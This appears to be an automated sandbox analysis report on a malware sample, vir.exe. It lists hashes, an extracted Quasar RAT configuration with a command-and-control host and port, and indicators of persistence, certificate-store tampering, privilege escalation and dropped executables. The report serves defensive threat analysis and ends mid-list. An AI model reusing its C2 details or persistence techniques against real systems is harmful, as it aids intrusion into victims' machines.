Analysis
-
max time kernel
150s -
max time network
164s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
08-11-2024 09:16
Behavioral task
behavioral1
Sample
vir.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
vir.exe
Resource
win10v2004-20241007-en
General
-
Target
vir.exe
-
Size
336.1MB
-
MD5
bc82ea785da1180a8a964b3e54ad106c
-
SHA1
4c1952ce778455af8ed10dca7b9f77d7815e8d0a
-
SHA256
c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b
-
SHA512
62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b
-
SSDEEP
6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0005000000019d40-216.dat family_umbral behavioral1/memory/3332-5640-0x00000000012A0000-0x00000000012E0000-memory.dmp family_umbral -
Njrat family
-
Quasar family
-
Quasar payload 11 IoCs
resource yara_rule behavioral1/files/0x0005000000019c5b-212.dat family_quasar behavioral1/memory/1272-4491-0x0000000001260000-0x0000000001584000-memory.dmp family_quasar behavioral1/memory/3144-4544-0x0000000000EA0000-0x00000000011C4000-memory.dmp family_quasar behavioral1/memory/2428-4912-0x0000000000FC0000-0x00000000012E4000-memory.dmp family_quasar behavioral1/memory/3140-5039-0x00000000002F0000-0x0000000000614000-memory.dmp family_quasar behavioral1/memory/3292-5317-0x0000000000ED0000-0x00000000011F4000-memory.dmp family_quasar behavioral1/memory/992-5433-0x0000000000110000-0x0000000000434000-memory.dmp family_quasar behavioral1/memory/848-5787-0x0000000000320000-0x0000000000644000-memory.dmp family_quasar behavioral1/memory/3336-6009-0x0000000000A50000-0x0000000000D74000-memory.dmp family_quasar behavioral1/memory/1540-6139-0x00000000012F0000-0x0000000001614000-memory.dmp family_quasar behavioral1/memory/912-6255-0x0000000000040000-0x0000000000364000-memory.dmp family_quasar -
Umbral family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 37 2484 mshta.exe 38 2484 mshta.exe 41 2484 mshta.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\DRIVERS\SETE8D9.tmp DrvInst.exe File created C:\Windows\system32\DRIVERS\SETE8D9.tmp DrvInst.exe File opened for modification C:\Windows\system32\DRIVERS\droidcam.sys DrvInst.exe -
Manipulates Digital Signatures 1 TTPs 3 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = 0f00000001000000140000005499b4f34c6397ce83670cd84156bdc761f906b30200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000330035003000310063006100310064002d0032006600360064002d0034003600300036002d0061006500340037002d0035006400610061006500300037003100340061003600350000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000430e77033e527f42dc67bc6984d33d889a73f0cd200000000100000000030000308202fc308201e4a003020102021033edcc7a9050638b4ebed4f8f15b4a5b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313835385a180f32313234313031353039313835385a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b82e6da8da56e44fb30c49a7bdc482bb9dca611d387f58526b4a0e5e0b800bf7aa47905e92ed1a6d124b929819391bad86059acb1771958341ec9d69e0747cc883709c117047778f4365d4f71b5645dfcc2430aab7b07a67af0bd67d382a98ac927f8410e76a7be57a9ed6a6e08c2604649c6a574c2c64fd4569f2b5d041985135c0c692a7f911205cfb5e5188cc5e4fa09ddb37caad8a808c6b735c929e705ec2201e91891eb72408769fd1949b24c53b87793cfbf1ece50b76b992723162930f19c81fa1ad81e6410813d3681e1d1f4768fceee7f035271ce4169150fae829aaf6b3f329b4753c9b33011326c1482c64a3aab54563fbafebc8c8e20dcffe790203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40504a4353444d52500030090603551d1304023000300d06092a864886f70d010105050003820101002b95f3244ef7172719b16e2c504a129ce40aa3eed42d8163b6387400c94562ee63249ca00e1cd91d6e3e5236941dd7fc1eea25e448201badc4186432fef63809b581790577b12dcfb0b167670a3d96cf55231fcb8c827f874e3e835bee7b68bffc8b9ebe67c9641746a8fce97480f40fd2ce8e7c26334f59a4d17c1e5822995877545d531fcac5a65e2b47ddee843edc79e0537e1cfdb0c35985912d82a67adf3ab01eb48bc64a69c9bcef6b9c42757e5aaf09c71f14f32c6205ee69753f7b70082ae0fdd3ebf152afce8f1977620b26a8946a4aaac5afb2ad1f5aedf6e2b80be614ce2f660dedbad3494c938771fbbcaf6daaa7f5c769f6a2db5a814d40c50b IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = 0f00000001000000140000005499b4f34c6397ce83670cd84156bdc761f906b3030000000100000014000000430e77033e527f42dc67bc6984d33d889a73f0cd0200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000330035003000310063006100310064002d0032006600360064002d0034003600300036002d0061006500340037002d0035006400610061006500300037003100340061003600350000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000200000000100000000030000308202fc308201e4a003020102021033edcc7a9050638b4ebed4f8f15b4a5b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313835385a180f32313234313031353039313835385a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b82e6da8da56e44fb30c49a7bdc482bb9dca611d387f58526b4a0e5e0b800bf7aa47905e92ed1a6d124b929819391bad86059acb1771958341ec9d69e0747cc883709c117047778f4365d4f71b5645dfcc2430aab7b07a67af0bd67d382a98ac927f8410e76a7be57a9ed6a6e08c2604649c6a574c2c64fd4569f2b5d041985135c0c692a7f911205cfb5e5188cc5e4fa09ddb37caad8a808c6b735c929e705ec2201e91891eb72408769fd1949b24c53b87793cfbf1ece50b76b992723162930f19c81fa1ad81e6410813d3681e1d1f4768fceee7f035271ce4169150fae829aaf6b3f329b4753c9b33011326c1482c64a3aab54563fbafebc8c8e20dcffe790203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40504a4353444d52500030090603551d1304023000300d06092a864886f70d010105050003820101002b95f3244ef7172719b16e2c504a129ce40aa3eed42d8163b6387400c94562ee63249ca00e1cd91d6e3e5236941dd7fc1eea25e448201badc4186432fef63809b581790577b12dcfb0b167670a3d96cf55231fcb8c827f874e3e835bee7b68bffc8b9ebe67c9641746a8fce97480f40fd2ce8e7c26334f59a4d17c1e5822995877545d531fcac5a65e2b47ddee843edc79e0537e1cfdb0c35985912d82a67adf3ab01eb48bc64a69c9bcef6b9c42757e5aaf09c71f14f32c6205ee69753f7b70082ae0fdd3ebf152afce8f1977620b26a8946a4aaac5afb2ad1f5aedf6e2b80be614ce2f660dedbad3494c938771fbbcaf6daaa7f5c769f6a2db5a814d40c50b IEXPLORE.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = 0f00000001000000140000005499b4f34c6397ce83670cd84156bdc761f906b3030000000100000014000000430e77033e527f42dc67bc6984d33d889a73f0cd200000000100000000030000308202fc308201e4a003020102021033edcc7a9050638b4ebed4f8f15b4a5b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313835385a180f32313234313031353039313835385a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b82e6da8da56e44fb30c49a7bdc482bb9dca611d387f58526b4a0e5e0b800bf7aa47905e92ed1a6d124b929819391bad86059acb1771958341ec9d69e0747cc883709c117047778f4365d4f71b5645dfcc2430aab7b07a67af0bd67d382a98ac927f8410e76a7be57a9ed6a6e08c2604649c6a574c2c64fd4569f2b5d041985135c0c692a7f911205cfb5e5188cc5e4fa09ddb37caad8a808c6b735c929e705ec2201e91891eb72408769fd1949b24c53b87793cfbf1ece50b76b992723162930f19c81fa1ad81e6410813d3681e1d1f4768fceee7f035271ce4169150fae829aaf6b3f329b4753c9b33011326c1482c64a3aab54563fbafebc8c8e20dcffe790203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40504a4353444d52500030090603551d1304023000300d06092a864886f70d010105050003820101002b95f3244ef7172719b16e2c504a129ce40aa3eed42d8163b6387400c94562ee63249ca00e1cd91d6e3e5236941dd7fc1eea25e448201badc4186432fef63809b581790577b12dcfb0b167670a3d96cf55231fcb8c827f874e3e835bee7b68bffc8b9ebe67c9641746a8fce97480f40fd2ce8e7c26334f59a4d17c1e5822995877545d531fcac5a65e2b47ddee843edc79e0537e1cfdb0c35985912d82a67adf3ab01eb48bc64a69c9bcef6b9c42757e5aaf09c71f14f32c6205ee69753f7b70082ae0fdd3ebf152afce8f1977620b26a8946a4aaac5afb2ad1f5aedf6e2b80be614ce2f660dedbad3494c938771fbbcaf6daaa7f5c769f6a2db5a814d40c50b IEXPLORE.EXE -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3924 netsh.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 3348 icacls.exe 3860 takeown.exe 2632 icacls.exe 2280 takeown.exe -
.NET Reactor proctector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/2908-373-0x0000000005B00000-0x0000000006050000-memory.dmp net_reactor behavioral1/memory/2908-374-0x0000000006050000-0x000000000659E000-memory.dmp net_reactor behavioral1/memory/2908-426-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-424-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-422-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-420-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-418-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-416-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-414-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-412-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-410-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-408-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-406-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-404-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-402-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-400-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-398-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-396-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-394-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-392-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-390-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-388-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-386-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-384-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-382-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-380-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-378-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-377-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-478-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-476-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-474-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-472-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-470-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-468-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor behavioral1/memory/2908-467-0x0000000006050000-0x0000000006599000-memory.dmp net_reactor -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe !FIXInj.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe !FIXInj.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 35 IoCs
pid Process 2908 Rover.exe 2240 Google.exe 3856 regmess.exe 3924 1.exe 3932 3.exe 3056 WinaeroTweaker-1.40.0.0-setup.exe 2140 WinaeroTweaker-1.40.0.0-setup.tmp 3776 psiphon-tunnel-core.exe 1272 scary.exe 2496 the.exe 2024 wimloader.dll 3144 Romilyaa.exe 4020 Romilyaa.exe 3864 ac3.exe 1952 vc_redist.x86.exe 1204 vc_redist.x86.exe 2120 insdrv.exe 2428 Romilyaa.exe 3140 Romilyaa.exe 3292 Romilyaa.exe 992 Romilyaa.exe 3052 freebobux.exe 1596 SolaraBootstraper.exe 1496 CLWCP.exe 2872 wim.dll 3112 SolaraBootstrapper.exe 3332 Umbral.exe 2804 !FIXInj.exe 848 Romilyaa.exe 3336 Romilyaa.exe 3328 f3cb220f1aaa32ca310586e5f62dcab1.exe 1540 Romilyaa.exe 912 Romilyaa.exe 2852 Romilyaa.exe 3328 Romilyaa.exe -
Loads dropped DLL 48 IoCs
pid Process 480 cmd.exe 480 cmd.exe 480 cmd.exe 3844 cmd.exe 3844 cmd.exe 3924 1.exe 1916 cmd.exe 3056 WinaeroTweaker-1.40.0.0-setup.exe 3924 1.exe 2140 WinaeroTweaker-1.40.0.0-setup.tmp 2140 WinaeroTweaker-1.40.0.0-setup.tmp 2140 WinaeroTweaker-1.40.0.0-setup.tmp 2140 WinaeroTweaker-1.40.0.0-setup.tmp 2140 WinaeroTweaker-1.40.0.0-setup.tmp 3932 3.exe 3932 3.exe 480 cmd.exe 480 cmd.exe 480 cmd.exe 3812 Process not Found 480 cmd.exe 480 cmd.exe 3924 1.exe 3924 1.exe 1952 vc_redist.x86.exe 1204 vc_redist.x86.exe 3724 regsvr32.exe 3156 regsvr32.exe 2280 regsvr32.exe 3924 1.exe 3924 1.exe 3116 Process not Found 3924 1.exe 3924 1.exe 3924 1.exe 3924 1.exe 3924 1.exe 480 cmd.exe 480 cmd.exe 480 cmd.exe 480 cmd.exe 480 cmd.exe 2568 cmd.exe 2568 cmd.exe 1596 SolaraBootstraper.exe 1596 SolaraBootstraper.exe 1596 SolaraBootstraper.exe 480 cmd.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 2280 takeown.exe 3348 icacls.exe 3860 takeown.exe 2632 icacls.exe -
Unexpected DNS network traffic destination 4 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 185.93.182.46 Destination IP 74.208.156.127 Destination IP 5.157.51.190 Destination IP 172.105.221.253 -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." !FIXInj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." !FIXInj.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00050000000195ab-107.dat autoit_exe behavioral1/files/0x00050000000194f1-191.dat autoit_exe behavioral1/files/0x0005000000019625-201.dat autoit_exe -
Drops file in System32 directory 20 IoCs
description ioc Process File opened for modification C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_neutral_d98d50465b5eb493\droidcam.PNF DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\infstrng.dat DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt insdrv.exe File opened for modification C:\Windows\System32\DriverStore\infpub.dat insdrv.exe File opened for modification C:\Windows\System32\DriverStore\infstor.dat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\infpub.dat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\infstrng.dat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.cat DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\infpub.dat DrvInst.exe File created C:\Windows\System32\DriverStore\INFCACHE.0 DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\infstrng.dat insdrv.exe File created C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.sys DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_neutral_d98d50465b5eb493\droidcam.PNF DrvInst.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1284 tasklist.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" CLWCP.exe -
resource yara_rule behavioral1/files/0x00050000000195f0-196.dat upx behavioral1/files/0x000500000001a448-228.dat upx behavioral1/memory/3932-3624-0x0000000000A40000-0x0000000002067000-memory.dmp upx behavioral1/memory/3932-4519-0x0000000000A40000-0x0000000002067000-memory.dmp upx behavioral1/memory/480-5605-0x00000000056D0000-0x0000000005B0E000-memory.dmp upx behavioral1/memory/3052-5607-0x0000000000400000-0x000000000083E000-memory.dmp upx behavioral1/memory/3052-5921-0x0000000000400000-0x000000000083E000-memory.dmp upx -
Drops file in Program Files directory 47 IoCs
description ioc Process File opened for modification C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\DroidCam\DroidCamApp.exe 1.exe File created C:\Program Files (x86)\DroidCam\lib\insdrv.exe 1.exe File opened for modification C:\Program Files\Winaero Tweaker\Elevator.exe WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-QLKRB.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-5TO3A.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-818V2.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-7KHEF.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\DroidCam\adb\AdbWinApi.dll 1.exe File created C:\Program Files (x86)\DroidCam\plist.dll 1.exe File created C:\Program Files (x86)\DroidCam\lib\DroidCamFilter64.ax 1.exe File created C:\Program Files (x86)\DroidCam\lib\droidcam.inf 1.exe File created C:\Program Files\Winaero Tweaker\is-15QD7.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\DroidCam\lib\DroidCamFilter32.ax 1.exe File created C:\Program Files (x86)\DroidCam\lib\droidcam.cat 1.exe File opened for modification C:\Program Files (x86)\DroidCam\lib\droidcam.cat 1.exe File created C:\Program Files (x86)\DroidCam\Licence.txt 1.exe File created C:\Program Files (x86)\DroidCam\loading.gif 1.exe File created C:\Program Files (x86)\DroidCam\With Stats.lnk 1.exe File created C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-STKIK.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\SubDir\Romilyaa.exe scary.exe File created C:\Program Files (x86)\DroidCam\adb\adb.exe 1.exe File created C:\Program Files (x86)\DroidCam\adb\AdbWinUsbApi.dll 1.exe File created C:\Program Files (x86)\DroidCam\usbmuxd.dll 1.exe File opened for modification C:\Program Files (x86)\DroidCam\lib\droidcam.inf 1.exe File created C:\Program Files (x86)\DroidCam\Toggle HD Mode.lnk 1.exe File created C:\Program Files (x86)\DroidCam\Uninstall.exe 1.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroControls.dll WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\DroidCam\lib\install.bat 1.exe File created C:\Program Files (x86)\DroidCam\swscale-5.dll 1.exe File opened for modification C:\Program Files (x86)\DroidCam\lib\droidcam.sys 1.exe File created C:\Program Files (x86)\DroidCam\avcodec-58.dll 1.exe File created C:\Program Files (x86)\DroidCam\libwinpthread-1.dll 1.exe File created C:\Program Files\Winaero Tweaker\is-8PQ85.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-V39CU.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files (x86)\DroidCam\vc_redist.x86.exe 1.exe File created C:\Program Files (x86)\DroidCam\lib\droidcam.sys 1.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-43JC1.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-4CTO5.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\DroidCam\vc_redist.x86.exe 1.exe File created C:\Program Files (x86)\DroidCam\avutil-56.dll 1.exe -
Drops file in Windows directory 12 IoCs
description ioc Process File opened for modification C:\Windows\INF\setupapi.app.log insdrv.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File opened for modification C:\Windows\INF\setupapi.ev2 DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log insdrv.exe File created C:\Windows\INF\oem2.inf DrvInst.exe File opened for modification C:\Windows\INF\oem2.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe File opened for modification C:\Windows\setupact.log DrvInst.exe File opened for modification C:\Windows\setuperr.log DrvInst.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language freebobux.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language !FIXInj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SolaraBootstrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ac3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinaeroTweaker-1.40.0.0-setup.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language psiphon-tunnel-core.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SolaraBootstraper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 